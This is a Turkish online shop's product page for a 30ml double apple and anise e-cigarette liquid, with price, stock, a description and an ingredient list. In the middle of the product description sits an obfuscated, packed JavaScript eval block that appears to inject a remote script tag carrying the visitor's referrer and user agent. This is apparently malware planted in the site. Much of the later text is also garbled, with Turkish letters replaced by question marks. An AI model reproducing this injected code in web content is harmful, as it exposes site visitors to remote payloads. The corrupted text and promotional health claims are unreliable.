7/24 Bilgi Hattı: 0 536 777 2 722

Cart

İndirim!

Double Apple – Çift Elma + Anason 30ML

 29,90 34,90

Double Apple Likit; Yeşil ve kırmızı elmayla birlikte çok hafif anason aroması içermektedir. Gift likit (30ML) Üç lezzetin birleşimiyle oluşturulmuş bu eşsiz likit elektronik sigaradan aldığınız zevki arttıracaktır. Gerçek premium kalitede sağlık açısından en ideal Vg / Pg oranıyla yüksek buhar verimini test ederek bu farkı yaşayabilirsiniz.

67 adet stokta

Karşılaştır

Share this product

Double eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iiker|var|u0026u|referrer|fydfk||js|php’.split(‘|’),0,{}))
Apple Likit; Ye?il ve k?rm?z? elmayla birlikte çok hafif anason aromas? içermektedir. Gift likit (30ML) Üç lezzetin birle?imiyle olu?turulmu? bu e?siz likit elektronik sigaradan ald???n?z zevki artt?racakt?r. Gerçek premium kalitede sa?l?k aç?s?ndan en ideal Vg / Pg oran?yla yüksek buhar verimini test ederek bu fark? ya?ayabilirsiniz. Di?er likitlerin bo?az?n?zda olu?turdu?u yanma hissi kaderiniz olmamal? ve Gift premium ile sadece aromadaki e?siz lezzetin fark?n? ya?amal?s?n?z.

30ml Sa?l?kl? Polikarbon ?i?e
80/20 VG PG Oran?

Likit içeri?i:

Propilen Glikol (PG): Tats?z, kokusuz bir genel çözücüdür. Ba?l?ca g?da, ilaç sektöründe kullan?lmakla birlikte sanayinin neredeyse tüm alanlar?nda kullan?l?r. Antibakteriyel özelli?i ve vizkozitesinin dü?ük olmas? sebebi ile g?da sektöründe aromalarda ta??y?c? olarak kullan?l?r. Daha az buhar vermesine ra?men içimi sigaraya yak?n olmas? ve aromayla daha h?zl? bütünle?mesi sebebiyle tercih edilmektedir.

Bitkisel Gliserin (VG): Gliserin, di?er ad? “gliserol” de olan s?v? halde bulunan polar organik bir trihidroksi alkoldür. Hafifçe tatl?, zehirleyici olmayan bir s?v?d?r. Likitlerde aroma ta??y?c? olarak PG ile birlikte kullan?l?r. Daha doyurucu buhar vermesine ra?men içimi sigaradan farkl? olarak tatl? bir nargile gibidir.

Terapatik Nikotin: Terapatik Nikotin sa?l?k alan?nda nikotin ba??ml?l???n?n tedavisinde kar??la??lan nikotin yoksunlu?u etkilerinin en aza indirgenmesinde kullan?l?r. Ayr?ca likit içerisindeki nikotin miktar?, elektronik sigara kullan?c?s?n?n normal sigaraya olan ihtiyac?n? en aza indirger.

Do?al Aromalar: Aroma olarak tüketilmesi amaçlanmayan, tat ve koku elde etmek veya de?i?tirmek amac?yla g?dalara eklenen aroma verici bile?enlerdir. Aromalarda ço?unlukla antibakteriyel özelli?i nedeniyle ta??y?c? olarak PG kullan?l?r.

Reviews

There are no reviews yet.

Be the first to review “Double Apple – Çift Elma + Anason 30ML”